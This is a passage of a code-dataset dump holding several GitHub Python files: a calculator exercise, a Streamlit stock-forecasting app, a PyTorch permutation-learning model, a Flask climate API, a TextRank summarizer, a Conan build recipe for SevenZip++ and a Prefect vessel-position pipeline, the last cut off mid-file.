evaluates strings as mathematical expressions, such as eval().\n\nInput: s = \"3+2*2\"\nOutput: 7\n\nInput: s = \" 3/2 \"\nOutput: 1\n\nInput: s = \" 3+5 / 2 \"\nOutput: 5\n\ns = \"3+2*2\"\nstack = [3,2]\npositive = True\nnum = ''\nval = 2\n\"\"\"\n\ndef calc(s: str) -> int:\n num = ''\n stack = []\n op = '+'\n for ch in s:\n if ch == ' ': continue\n if ch.isdigit():\n num += ch\n else:\n if op == '+':\n stack.append(int(num))\n elif op == '-':\n stack.append(-1*int(num))\n elif op == '*':\n last = stack.pop()\n stack.append(last*int(num))\n elif op == '/':\n last = stack.pop()\n stack.append(last // int(num))\n num = ''\n op = ch\n if num:\n if op == '+':\n stack.append(int(num))\n elif op == '-':\n stack.append(-1*int(num))\n elif op == '*':\n last = stack.pop()\n stack.append(last*int(num))\n elif op == '/':\n last = stack.pop()\n stack.append(last // int(num))\n return sum(stack)\n\nprint(calc('3+2*2/1'))\nprint(calc('3+2*2/5'))\n","repo_name":"manavdahra/interview-prep","sub_path":"basic_calc_2.py","file_name":"basic_calc_2.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8559810611","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nfrom functions import gbm, prev_graph, hist\nfrom pytickersymbols import PyTickerSymbols\n\nst.set_page_config(page_title = \"Stock Forecasting\", layout = \"wide\")\n\nstock_data = PyTickerSymbols()\nus_stocks = stock_data.get_stocks_by_index(\"S&P 500\")\ndf = pd.DataFrame.from_dict(list(us_stocks), orient='columns')\ntickers = df[\"symbol\"]\n\nwith st.container(): \n\tst.title(\"📈 Stock Price Forecasting\")\n\tst.write(\"Forecasting future stock prices with geometric brownian motion modeled by a random walk\")\n#st.markdown(\"App made by Diogo Pedrosa and Tiago Gonçalves for *Simulação e Processos Estocásticos* subject from Faculdade de Ciências da Universidade do Porto\")\nst.markdown(\"**This app is not meant to give financial advice nor are we credited to do so**\")\nst.write(\"---\")\n\ncol1, col2, col3 = st.columns(3)\n\nticker = col1.selectbox(\"Select a stock\", tickers)\nprev_data = col2.selectbox(\"Select the lenght of training data\", [\"6 Months\", \"1 Year\", \"3 Years\", \"5 Years\"])\nruns = col3.selectbox(\"Select the number of simulations\", [1000, 2500, 5000])\n\nst.write(\"---\")\n\ndf = gbm(ticker, prev_data, runs)\n\ncol1, col2 = st.columns(2)\n\ncol1.pyplot(prev_graph(df, ticker, runs), use_container_width = True)\ncol2.pyplot(hist(df, ticker), use_container_width = True)\n\n\n","repo_name":"tiago-trigo/Geometric-Brownian-Motion","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"21441166063","text":"\"\"\"Implements a structured fully connected layer.\"\"\"\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom struct_discovery.layers.struct_base_layer import StructBaseLayer\n\n\n# Gumbel sinkhorn support from https://github.com/perrying/gumbel-sinkhorn/blob/master/utils/gumbel_sinkhorn_ops.py\ndef log_sinkhorn_norm(log_alpha: torch.Tensor, n_iter: int = 20) -> (torch.Tensor,):\n for _ in range(n_iter):\n log_alpha = log_alpha - torch.logsumexp(log_alpha, -1, keepdim=True)\n log_alpha = log_alpha - torch.logsumexp(log_alpha, -2, keepdim=True)\n return log_alpha.exp()\n\n\ndef gumbel_sinkhorn(log_alpha: torch.Tensor, tau: float = 1.0, n_iter: int = 20, noise: bool = True) -> (torch.Tensor,):\n if noise:\n uniform_noise = torch.rand_like(log_alpha)\n gumbel_noise = -torch.log(-torch.log(uniform_noise+1e-20)+1e-20)\n log_alpha = (log_alpha + gumbel_noise)/tau\n sampled_perm_mat = log_sinkhorn_norm(log_alpha, n_iter)\n return sampled_perm_mat\n\n\nclass AugerinoModel(StructBaseLayer):\n def __init__(self, emb_dim=500, max_length=10, h_dim=50, sample_size=1, data_mean=0, data_std=1):\n super(AugerinoModel, self).__init__()\n self.emb_dim = emb_dim\n self.max_length = max_length\n self.h_dim = h_dim\n self.sample_size = sample_size\n\n self.data_mean = data_mean\n self.data_std = data_std\n\n # Embedding layer.\n self.emb = nn.Embedding(11, emb_dim, padding_idx=0)\n\n # Output layer.\n self.out = torch.nn.Linear(h_dim, 1)\n # Register their parameters.\n for num, pp in enumerate(list(self.emb.parameters())):\n self.register_model_parameters('emb_%s' % num, pp)\n for num, pp in enumerate(list(self.out.parameters())):\n self.register_model_parameters('out_%s' % num, pp)\n\n # One fully connected layer for each max_length.\n self.weights = nn.Parameter(torch.Tensor(\n max_length, self.h_dim, self.emb_dim))\n self.bias = nn.Parameter(torch.Tensor(max_length, self.h_dim))\n self.register_model_parameters('weights', self.weights)\n self.register_model_parameters('bias', self.bias)\n\n # Structured Linear layer\n self.structure = nn.Parameter(torch.Tensor(max_length, max_length))\n self.register_hyper_parameters('structure', self.structure)\n\n # Augerino Augmentation param.\n self.permute = nn.Parameter(torch.Tensor(max_length, max_length))\n self.register_model_parameters('permute', self.structure)\n\n self.reset_parameters()\n\n # Hard code sharing to identity.\n with torch.no_grad():\n A_init = np.eye(max_length)\n A_init_scale = 10.\n AA = A_init_scale * \\\n torch.from_numpy(A_init).float()-(A_init_scale/2.)\n self.structure.copy_(AA)\n self.entropy_weight = 1\n self.tau = 0.1\n\n def reset_model_parameters(self):\n nn.init.xavier_uniform_(self.weights)\n nn.init.uniform_(self.bias, -0.1, 0.1)\n\n def reset_parameters(self):\n nn.init.xavier_uniform_(self.weights)\n nn.init.uniform_(self.bias, -0.1, 0.1)\n nn.init.uniform_(self.structure, -0.1, 0.1)\n nn.init.uniform_(self.permute, -0.1, 0.1)\n\n def forward_A(self):\n return torch.exp(nn.functional.log_softmax(self.structure, 1))\n\n def forward(self, x):\n feat = self.emb(x) # [Batch, max_len, emb_dim]\n # Apply Transformation Here.\n all_copy = []\n for k in range(self.sample_size+1):\n gs_mat = gumbel_sinkhorn(\n torch.cat([self.permute.unsqueeze(0)]*x.shape[0]), tau=self.tau)\n feat = torch.matmul(gs_mat, feat)\n # Structured fully connected layer.\n A = self.forward_A()\n # A on weights is the same as A on activation for mm.\n ww, bb = self.weights, self.bias\n d1, d2, d3 = ww.shape\n # Add sharing.\n ww = A.matmul(ww.reshape(d1, d2*d3))\n ww = ww.reshape(d1, d2, d3)\n bb = A.matmul(bb)\n # Run inference.\n h = []\n for k in range(self.max_length):\n h.append(F.linear(feat[:, k], ww[k], bb[k]))\n hh = torch.stack(h, 1)\n hh = F.relu(hh)\n # Pooling.\n hh = torch.sum(hh, 1)\n # Output layer.\n y_hat = self.out(hh)\n all_copy.append(y_hat.unsqueeze(0))\n # [Batch, 1]\n y_hat = torch.cat(all_copy, 0).mean(0)\n return y_hat\n\n def predict(self, x):\n y_hat = self.forward(x)\n return y_hat*self.data_std+self.data_mean\n\n def total_loss(self, input, target):\n return torch.mean(torch.abs(input.squeeze()-(target.squeeze()-self.data_mean)/self.data_std))\n\n def total_val_loss(self, input, target):\n \"\"\"Total + reg on A.\"\"\"\n loss_reg = 0\n AA = self.forward_A()\n loss_reg += torch.trace(torch.sqrt(AA.T.mm(AA)))/AA.shape[0]\n loss_reg += -self.entropy_weight * \\\n torch.sum(torch.log(AA+1e-6)*(AA+1e-6), -1).mean()*0.5\n return self.total_loss(input, target) + 0.05*loss_reg\n","repo_name":"raymondyeh07/equivariance_discovery","sub_path":"projects/PermutationSharing/permutation_sharing/model/augerino_model.py","file_name":"augerino_model.py","file_ext":"py","file_size_in_byte":5222,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"30293603807","text":"# Dependencies\nimport datetime as dt\nimport pandas as pd\nimport numpy as np\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func, inspect\nfrom flask import Flask, jsonify\n\n# set up database engine\n# connect_args needed because Python is a single thread application\n## the other option is to open session = Session(engine) within each function\nengine = create_engine(\"sqlite:///../Resources/hawaii.sqlite\", connect_args={'check_same_thread': False})\ninspector = inspect(engine)\n\n# Reflect database into our classes\nBase = automap_base()\nBase.prepare(engine, reflect=True)\n\n# Save references to each table\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n\n# Create our session (link) from Python to the DB\nsession = Session(engine)\n\n# Create a new flask app 'instance'\napp = Flask(__name__)\n\n# define 'starting point' a.k.a the 'root'\n@app.route('/') ## the '/' denotes that we want to put our data at the root of our routes\n# create a function that i want in this specific route\ndef welcome():\n return (\"\"\"\n Welcome to the Climate Analysis API!
\n Available Routes:
\n
/api/v1.0/precipitation
\n /api/v1.0/stations
\n /api/v1.0/tobs
\n /api/v1.0/temp
\n \"\"\")\n\n@app.route('/api/v1.0/precipitation')\ndef precipitation():\n\n prev_year = dt.date(2017,8,23) - dt.timedelta(days=365)\n precipitation = session.query(Measurement.date, Measurement.prcp).filter(Measurement.date >= prev_year).all()\n precip = {date: prcp for date, prcp in precipitation}\n return jsonify(precip)\n\n\n@app.route('/api/v1.0/stations')\ndef stations():\n\n results = session.query(Station.station).all()\n stations = list(np.ravel(results)) # unravel results into a one-dimensional array and convert the array to a list\n return jsonify(stations=stations)\n\n@app.route('/api/v1.0/tobs')\ndef temps_monthly():\n prev_year = dt.date(2017,8,23) - dt.timedelta(days=365)\n results = session.query(Measurement.tobs).\\\n filter(Measurement.station == 'USC00519281').filter(Measurement.date >= prev_year).all()\n temps = list(np.ravel(results))\n return jsonify(temps=temps)\n\n@app.route(\"/api/v1.0/temp/\")\n@app.route(\"/api/v1.0/temp//\")\ndef stats(start=None, end=None):\n sel = [func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)]\n\n if not end:\n results = session.query(*sel).\\\n filter(Measurement.date >= start).all()\n temps = list(np.ravel(results))\n return jsonify(temps=temps)\n \n results = session.query(*sel).\\\n filter(Measurement.date >= start).\\\n filter(Measurement.date <= end).all()\n temps = list(np.ravel(results))\n return jsonify(temps)\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"JustGitCoding/Surfing_Weather_Analysis","sub_path":"workingfiles/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38537773172","text":"import config\n\ndef summarize(textGraph):\n\tgraph = textGraph.graph\n\tnumberOfVertices = textGraph.numberOfVertices\n\n\trankedGraph, vertexScores = rank(graph, numberOfVertices)\n\n\tsummarySize = int(numberOfVertices / config.TEXT_TO_SUMMARY_RATIO)\n\n\tvertexScores.sort(reverse = True)\n\tminScore = vertexScores[summarySize]\n\n\tsummary = \"\"\n\n\tfor vertex, attribute in graph.items():\n\t\tif (attribute[0] >= minScore):\n\t\t\tsummary += str(attribute[1])\n\t\t\tif len(summary.split(\" \")) > config.MAX_WORDS:\n\t\t\t\tbreak\n\n\treturn summary\n\ndef rank(graph, numberOfVertices):\n\n\tverticesAboveThreshold = []\n\tvertexScores = []\n\titeration = 0\n\n\twhile(True):\n\t\titeration += 1\n\t\tfor vertex, attribute in graph.items():\n\t\t\tvertexStrength = 0\n\t\t\toldScore = attribute[0]\n\n\t\t\tfor neighbour in attribute[2]:\n\t\t\t\tvertexStrength += getNeighbourStrength(neighbour[0], neighbour[1], graph)\n\n\t\t\tnewScore = (1 - config.DAMPING_FACTOR) + (config.DAMPING_FACTOR * vertexStrength)\n\n\t\t\tif abs(newScore - oldScore) <= config.THRESHOLD:\n\t\t\t\tif vertex not in verticesAboveThreshold:\n\t\t\t\t\tverticesAboveThreshold.append(vertex)\n\t\t\t\t\tvertexScores.append(oldScore)\n\n\t\t\telse:\n\t\t\t\tattribute[0] = newScore\n\n\t\tif (len(verticesAboveThreshold) == numberOfVertices) or (iteration == 100):\n\t\t\tbreak\n\n\treturn (graph, vertexScores)\n\n\t\n\n\ndef getNeighbourStrength(neighbour, cxnWeight, graph):\n\tneighbourScore = graph[neighbour][0]\n\n\tneighbourStrength = 0\n\tfor cxn in graph[neighbour][2]:\n\t\tneighbourStrength += cxn[1]\n\n\treturn neighbourScore * cxnWeight / neighbourStrength\n\n\n\n\n\n","repo_name":"aparkala/textRankSummarizer","sub_path":"algorithms/textRank.py","file_name":"textRank.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18821654962","text":"import os\nfrom conans import ConanFile, MSBuild, VisualStudioBuildEnvironment, tools\nfrom conans.util.files import tmp_file\n\ncomponentName = \"SevenZip\"\n\nclass CoreConan(ConanFile):\n name = componentName\n# version = \"1.0\"\n license = \"\"\n url = \"\"\n description = \"\"\n settings = \"os\", \"compiler\", \"build_type\", \"arch\"\n options = {\"shared\": [True, False]}\n default_options = \"shared=False\"\n generators = \"visual_studio_multi\"\n\n scm = {\n \"type\": \"git\",\n \"url\": \"auto\",\n \"revision\": \"auto\"\n }\n \n def build(self):\n os.chdir(\"depends/7z1701-src/CPP/7zip/Bundles/StaticLib\");\n\n makeHeader = \"\"\n\n if self.options.shared == \"False\":\n makeHeader += \"STATIC_LIB=1\\n\"\n makeHeader += \"NO_DEFAULT_RES=1\\n\"\n \n if self.settings.compiler.runtime == \"MD\" or self.settings.compiler.runtime == \"MDd\":\n makeHeader += \"MY_SINGLE_THREAD=1\\n\"\n \n if self.settings.build_type == \"Debug\":\n makeHeader += \"MY_DEBUG=1\\n\"\n \n makeHeader += '!include \"makefile.base\"\\n'\n\n tools.save(\"makefile.conan\", makeHeader)\n \n if self.settings.os == \"Windows\":\n vcvars = tools.vcvars_command(self.settings)\n build_command = \"\"\n print(\"{0} && nmake -f makefile.conan\".format(vcvars))\n self.run(\"{0} && nmake -f makefile.conan\".format(vcvars))\n \n os.chdir(\"../../../../../..\")\n os.chdir('SevenZip++')\n \n libMachine = {\n \"x86\" : \"MachineX86\"\n ,'x86_64' : 'MachineX64'\n }.get(self.settings.get_safe(\"arch\"), \"\")\n \n libMachine_node = \"\" \\\n \"{}\" \\\n \"\".format(libMachine) if libMachine else \"\"\n \n runtime_library = {\"MT\": \"MultiThreaded\",\n \"MTd\": \"MultiThreadedDebug\",\n \"MD\": \"MultiThreadedDLL\",\n \"MDd\": \"MultiThreadedDebugDLL\"}.get(self.settings.get_safe(\"compiler.runtime\"), \"\")\n\n runtime_node = \"\" \\\n \"{}\" \\\n \"\".format(runtime_library) if runtime_library else \"\"\n\n props_file_contents = \"\"\"\n\n \n {0}\n \n {1}\n \n \n \n\"\"\".format(libMachine_node, runtime_node)\n with tmp_file(props_file_contents) as props_file_path:\n msbuild = MSBuild(self)\n msbuild.build(\n \"SevenZip++.vcxproj\"\n , toolset = self.settings.compiler.toolset\n , platforms={ \n \"x86\" : \"Win32\"\n ,'x86_64' : 'x64'\n }\n , properties = {\n \"ForceImportBeforeCppTargets\" : props_file_path\n }\n )\n\n def package(self):\n self.copy(\"*.h\", dst=\"include/SevenZip\", src=\"SevenZip++\")\n self.copy(\"SevenZip++*.lib\", dst=\"lib\", keep_path=False)\n self.copy(\"SevenZip++*.dll\", dst=\"bin\", keep_path=False)\n self.copy(\"SevenZip++*.dylib*\", dst=\"lib\", keep_path=False)\n self.copy(\"SevenZip++*.so\", dst=\"lib\", keep_path=False)\n self.copy(\"SevenZip++*.a\", dst=\"lib\", keep_path=False)\n\n def package_info(self):\n name = \"SevenZip\"\n \n if self.settings.build_type == \"Debug\":\n name += \"d\"\n\n name += \".lib\"\n self.cpp_info.libs = [name] # The libs to link against\n \n \n self.cpp_info.includedirs = ['include'] # Ordered list of include paths\n self.cpp_info.libdirs = ['lib'] # Directories where libraries can be found\n self.cpp_info.resdirs = ['res'] # Directories where resources, data, etc can be found\n self.cpp_info.bindirs = ['bin'] # Directories where executables and shared libs can be found\n self.cpp_info.defines = [] # preprocessor definitions\n self.cpp_info.cflags = [] # pure C flags\n self.cpp_info.cppflags = [] # C++ compilation flags\n self.cpp_info.sharedlinkflags = [] # linker flags\n self.cpp_info.exelinkflags = [] # linker flags\n \n # if self.options.shared == \"False\":\n # self.cpp_info.defines.append(\"{0}_STATIC_LIB\".format(componentName.upper()))\n\n ","repo_name":"ProtocolONE/cord.seven-zip","sub_path":"conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":4527,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"70733802805","text":"from datetime import datetime\nfrom pathlib import Path\nfrom typing import Tuple\n\nimport pandas as pd\nimport prefect\nfrom prefect import Flow, Parameter, case, task\nfrom prefect.executors import LocalDaskExecutor\nfrom prefect.tasks.control_flow import merge\n\nfrom config import CURRENT_POSITION_ESTIMATION_MAX_HOURS, default_risk_factors\nfrom src.pipeline.generic_tasks import extract, load\nfrom src.pipeline.helpers.spatial import estimate_current_position\nfrom src.pipeline.processing import (\n coalesce,\n drop_duplicates_by_decreasing_priority,\n join_on_multiple_keys,\n left_isin_right_by_decreasing_priority,\n)\nfrom src.pipeline.shared_tasks.control_flow import check_flow_not_running\nfrom src.pipeline.shared_tasks.healthcheck import (\n assert_positions_received_by_api_health,\n get_monitorfish_healthcheck,\n)\nfrom src.pipeline.shared_tasks.infrastructure import get_table\nfrom src.pipeline.shared_tasks.positions import (\n add_vessel_identifier,\n tag_positions_at_port,\n)\nfrom src.pipeline.shared_tasks.vessels import add_vessel_id\n\n\n@task(checkpoint=False)\ndef validate_action(action: str) -> str:\n \"\"\"\n Checks that the received parameter value is valid and returns it. Raises ValueError\n otherwise.\n\n Args:\n action (str): input parameter for the flow\n\n Returns:\n str: input, if valid\n\n Raises:\n ValueError: if input in not valid\n \"\"\"\n\n valid_actions = {\"update\", \"replace\"}\n\n if action in valid_actions:\n return action\n else:\n raise ValueError(\n f\"action must be one of {', '.join(valid_actions)}, got {action}\"\n )\n\n\n@task(checkpoint=False)\ndef extract_last_positions(minutes: int) -> pd.DataFrame:\n \"\"\"\n Extracts the last position of each vessel over the past `minutes` minutes.\n\n Args:\n minutes (int): number of minutes from current datetime to extract\n\n Returns:\n pd.DataFrame: DataFrame of vessels' last position.\n \"\"\"\n return extract(\n db_name=\"monitorfish_remote\",\n query_filepath=\"monitorfish/compute_last_positions.sql\",\n params={\"minutes\": minutes},\n dtypes={\"last_position_datetime_utc\": \"datetime64[ns]\"},\n )\n\n\n@task(checkpoint=False)\ndef extract_pending_alerts() -> pd.DataFrame:\n return extract(\n db_name=\"monitorfish_remote\",\n query_filepath=\"monitorfish/pending_alerts.sql\",\n )\n\n\n@task(checkpoint=False)\ndef extract_reportings() -> pd.DataFrame:\n return extract(\n db_name=\"monitorfish_remote\",\n query_filepath=\"monitorfish/reportings.sql\",\n )\n\n\n@task(checkpoint=False)\ndef drop_duplicates(positions: pd.DataFrame) -> pd.DataFrame:\n \"\"\"\n Drop duplicate vessels in a `pandas.DataFrame` of positions, keeping only the most\n recent position of each vessel.\n\n This is required although the query that computes last positions already contains a\n DISTINCT ON clause because for some vessels, we receive each position twice with\n partially different identifiers - for instance, the same CFR but different ircs or\n external immatriculation.\n\n De-deplucation is done using, by decreasing priority, vessel_id, CFR, ircs and\n external_immatriculation.\n\n Args:\n positions (pd.DataFrame): positions of vessels. Must contain columns\n \"vessel_id\", \"cfr\", \"external_immatriculation\", \"ircs\" and\n \"last_position_datetime_utc\".\n\n Returns:\n pd.DataFrame: DataFrame of vessels' last position with duplicates removed.\n \"\"\"\n return drop_duplicates_by_decreasing_priority(\n positions.sort_values(by=\"last_position_datetime_utc\", ascending=False),\n subset=[\"vessel_id\", \"cfr\", \"ircs\", \"external_immatriculation\"],\n )\n\n\n@task(checkpoint=False)\ndef extract_previous_last_positions() -> pd.DataFrame:\n \"\"\"\n Extracts the contents of the `last_positions` table (which was computed by the\n previous run of the `last_positions` flow), with the `has_charter` field updated\n by taking the current value in the `vessels` table.\n\n Returns:\n pd.DataFrame: DataFrame of vessels' last position as (it was last computed by\n the last_positions flow).\n \"\"\"\n return extract(\n db_name=\"monitorfish_remote\",\n query_filepath=\"monitorfish/previous_last_positions.sql\",\n )\n\n\n@task(checkpoint=False)\ndef drop_unchanged_new_last_positions(\n new_last_positions: pd.DataFrame, previous_last_positions: pd.DataFrame\n) -> pd.DataFrame:\n \"\"\"\n Filters all positions of new_last_positions that are present in\n previous_last_positions.\n\n Args:\n previous_last_positions (pd.DataFrame)\n new_last_positions (pd.DataFrame)\n\n Returns:\n pd.DataFrame: subset of new_last_positions\n \"\"\"\n return new_last_positions[\n ~new_last_positions.id.isin(set(previous_last_positions.id))\n ].copy(deep=True)\n\n\n@task(checkpoint=False)\ndef split(\n previous_last_positions: pd.DataFrame, new_last_positions: pd.DataFrame\n) -> Tuple[pd.DataFrame, pd.DataFrame, pd.DataFrame]:\n \"\"\"\n Splits vessels into 3 categories:\n\n - The ones that are in previous_last_positions only (known vessels that haven't\n moved)\n - The ones that are in new_last_positions only (new vessels never seen before)\n - The ones in both datasets (known vessels that have moved and whose position must\n be updated)\n\n Returns the last_positions data of these 3 sets of vessels separately in 3\n DataFrames. For vessels whose position must be updated, the returned DataFrame\n contains the data of both the previous and the new last_position, in order to make\n it possible to computed some metrics (i.e. the emission period).\n\n Args:\n previous_last_positions (pd.DataFrame)\n new_last_positions (pd.DataFrame)\n\n Returns:\n Tuple[pd.DataFrame, pd.DataFrame, pd.DataFrame]:\n - unchanged_previous_last_positions\n - new_vessels_last_positions\n - last_positions_to_update\n \"\"\"\n\n previous_last_positions = previous_last_positions.copy(deep=True)\n new_last_positions = new_last_positions.copy(deep=True)\n\n vessel_id_cols = [\"vessel_id\", \"cfr\", \"ircs\", \"external_immatriculation\"]\n\n unchanged_previous_last_positions = previous_last_positions[\n ~left_isin_right_by_decreasing_priority(\n previous_last_positions[vessel_id_cols], new_last_positions[vessel_id_cols]\n )\n ]\n\n new_vessels_last_positions = new_last_positions[\n ~left_isin_right_by_decreasing_priority(\n new_last_positions[vessel_id_cols], previous_last_positions[vessel_id_cols]\n )\n ]\n\n last_positions_to_update = join_on_multiple_keys(\n (\n new_last_positions.rename(\n columns={\"last_position_datetime_utc\": \"last_position_datetime_utc_new\"}\n )\n ),\n (\n previous_last_positions[\n vessel_id_cols + [\"last_position_datetime_utc\"]\n ].rename(\n columns={\n \"last_position_datetime_utc\": \"last_position_datetime_utc_previous\"\n }\n )\n ),\n or_join_keys=vessel_id_cols,\n how=\"inner\",\n coalesce_common_columns=False,\n )\n\n return (\n unchanged_previous_last_positions,\n new_vessels_last_positions,\n last_positions_to_update,\n )\n\n\n@task(checkpoint=False)\ndef compute_emission_period(last_positions_to_update: pd.DataFrame) -> pd.DataFrame:\n \"\"\"\n Computes the emission period of the last_positions that require an update.\n\n If an emission period is already present (which might happen if there are more\n than one position per vessel in the requested time period of the last_position\n query), this emission period is used. Otherwise, the emission period is taken to\n be equal to the time between the previous last_position_datetime_utc and the new\n last_position_datetime_utc.\n\n Args:\n last_positions_to_update (pd.DataFrame): last_positions data for vessels that\n have moved\n\n Returns:\n pd.DataFrame: updated last_positions with computed emission period field\n\n \"\"\"\n\n updated_last_positions = last_positions_to_update.copy(deep=True)\n\n updated_last_positions[\"new_to_previous_time_interval\"] = (\n updated_last_positions.last_position_datetime_utc_new\n - updated_last_positions.last_position_datetime_utc_previous\n )\n\n updated_last_positions.loc[:, \"emission_period\"] = coalesce(\n updated_last_positions[[\"emission_period\", \"new_to_previous_time_interval\"]]\n )\n\n updated_last_positions = updated_last_positions.drop(\n columns=[\"new_to_previous_time_interval\", \"last_position_datetime_utc_previous\"]\n ).rename(columns={\"last_position_datetime_utc_new\": \"last_position_datetime_utc\"})\n\n return updated_last_positions\n\n\n@task(checkpoint=False)\ndef concatenate(\n unchanged_previous_last_positions: pd.DataFrame,\n new_vessels_last_positions: pd.DataFrame,\n updated_last_positions: pd.DataFrame,\n) -> pd.DataFrame:\n \"\"\"\n Concatenates the 3 sets of last_positions and reindexes the rows from 1 to n.\n\n Args:\n unchanged_previous_last_positions (pd.DataFrame)\n new_vessels_last_positions (pd.DataFrame)\n updated_last_positions (pd.DataFrame)\n\n Returns:\n pd.DataFrame: concatenation of the 3 inputs sets of last_positions\n \"\"\"\n\n last_positions = (\n pd.concat(\n [\n unchanged_previous_last_positions,\n new_vessels_last_positions,\n updated_last_positions,\n ]\n )\n .reset_index()\n .drop(columns=[\"index\"])\n )\n\n return last_positions\n\n\n@task(checkpoint=False)\ndef extract_risk_factors():\n return extract(\n db_name=\"monitorfish_remote\",\n query_filepath=\"monitorfish/risk_factors.sql\",\n )\n\n\n@task(checkpoint=False)\ndef extract_beacon_malfunctions():\n return extract(\n db_name=\"monitorfish_remote\",\n query_filepath=\"monitorfish/beacon_malfunctions_for_last_positions.sql\",\n )\n\n\n@task(checkpoint=False)\ndef estimate_current_positions(\n last_positions: pd.DataFrame, max_hours_since_last_position: float\n) -> pd.DataFrame:\n \"\"\"\n\n Args:\n last_positions (pd.DataFrame): vessels' last position with route and speed\n data.\n max_hours_since_last_position (float): maximum time in hours since the last\n position above which the current position will not be extrapolated.\n\n Returns:\n pd.DataFrame: vessels' last position with added estimated_current_latitude and\n estimated_current_longitude fields\n\n \"\"\"\n\n last_positions = last_positions.copy(deep=True)\n now = datetime.utcnow()\n\n estimated_position_cols = [\n \"estimated_current_latitude\",\n \"estimated_current_longitude\",\n ]\n\n last_positions[estimated_position_cols] = last_positions.apply(\n lambda row: estimate_current_position(\n last_latitude=row[\"latitude\"],\n last_longitude=row[\"longitude\"],\n course=row[\"course\"],\n speed=row[\"speed\"],\n hours_since_last_position=(\n (now - row[\"last_position_datetime_utc\"]).total_seconds() / 3600\n ),\n max_hours_since_last_position=max_hours_since_last_position,\n on_error=\"ignore\",\n ),\n axis=1,\n result_type=\"expand\",\n )\n\n return last_positions\n\n\n@task(checkpoint=False)\ndef join(\n last_positions: pd.DataFrame,\n risk_factors: pd.DataFrame,\n pending_alerts: pd.DataFrame,\n reportings: pd.DataFrame,\n beacon_malfunctions: pd.DataFrame,\n) -> pd.DataFrame:\n \"\"\"\n Performs a left join on last_positions, risk_factors, pending_alerts, reportings and\n beacon_malfunctions using vessel_id cfr, ircs and external_immatriculation as join\n keys.\n \"\"\"\n join_keys = [\"vessel_id\", \"cfr\", \"ircs\", \"external_immatriculation\"]\n\n last_positions = join_on_multiple_keys(\n last_positions,\n risk_factors,\n or_join_keys=join_keys,\n how=\"left\",\n )\n\n last_positions = join_on_multiple_keys(\n last_positions,\n pending_alerts,\n or_join_keys=join_keys,\n how=\"left\",\n )\n\n last_positions = join_on_multiple_keys(\n last_positions,\n reportings,\n or_join_keys=join_keys,\n how=\"left\",\n )\n\n last_positions = join_on_multiple_keys(\n last_positions,\n beacon_malfunctions.rename(columns={\"id\": \"beacon_malfunction_id\"}),\n or_join_keys=join_keys,\n how=\"left\",\n )\n\n last_positions = last_positions.fillna(\n {**default_risk_factors, \"total_weight_onboard\": 0.0}\n ).astype({\"vessel_id\": float})\n\n return last_positions\n\n\n@task(checkpoint=False)\ndef load_last_positions(last_positions):\n load(\n last_positions,\n table_name=\"last_positions\",\n schema=\"public\",\n db_name=\"monitorfish_remote\",\n logger=prefect.context.get(\"logger\"),\n how=\"replace\",\n pg_array_columns=[\"segments\", \"alerts\", \"reportings\"],\n handle_array_conversion_errors=True,\n value_on_array_conversion_error=\"{}\",\n jsonb_columns=[\"gear_onboard\", \"species_onboard\"],\n nullable_integer_columns=[\"beacon_malfunction_id\", \"vessel_id\"],\n timedelta_columns=[\"emission_period\"],\n )\n\n\nwith Flow(\"Last positions\", executor=LocalDaskExecutor()) as flow:\n # Only run if the previous run has finished running\n flow_not_running = check_flow_not_running()\n with case(flow_not_running, True):\n healthcheck = get_monitorfish_healthcheck()\n positions_healthcheck = assert_positions_received_by_api_health(\n healthcheck=healthcheck\n )\n\n # Parameters\n current_position_estimation_max_hours = Parameter(\n \"current_position_estimation_max_hours\",\n default=CURRENT_POSITION_ESTIMATION_MAX_HOURS,\n )\n minutes = Parameter(\"minutes\", default=5)\n action = Parameter(\"action\", default=\"update\")\n action = validate_action(action, upstream_tasks=[positions_healthcheck])\n\n # Extract & Transform\n\n vessels_table = get_table(\"vessels\")\n\n risk_factors = extract_risk_factors(upstream_tasks=[positions_healthcheck])\n pending_alerts = extract_pending_alerts(upstream_tasks=[positions_healthcheck])\n reportings = extract_reportings(upstream_tasks=[positions_healthcheck])\n beacon_malfunctions = extract_beacon_malfunctions(\n upstream_tasks=[positions_healthcheck]\n )\n\n last_positions = extract_last_positions(minutes=minutes)\n last_positions = add_vessel_id(last_positions, vessels_table)\n last_positions = drop_duplicates(last_positions)\n last_positions = add_vessel_identifier(last_positions)\n last_positions = tag_positions_at_port(last_positions)\n\n with case(action, \"update\"):\n previous_last_positions = extract_previous_last_positions()\n previous_last_positions = add_vessel_id(\n previous_last_positions, vessels_table\n )\n previous_last_positions = drop_duplicates(previous_last_positions)\n new_last_positions = drop_unchanged_new_last_positions(\n last_positions, previous_last_positions\n )\n\n (\n unchanged_previous_last_positions,\n new_vessels_last_positions,\n last_positions_to_update,\n ) = split(previous_last_positions, new_last_positions)\n updated_last_positions = compute_emission_period(last_positions_to_update)\n\n last_positions_1 = concatenate(\n unchanged_previous_last_positions,\n new_vessels_last_positions,\n updated_last_positions,\n )\n\n with case(action, \"replace\"):\n last_positions_2 = last_positions\n\n last_positions = merge(last_positions_1, last_positions_2, checkpoint=False)\n\n last_positions = estimate_current_positions(\n last_positions=last_positions,\n 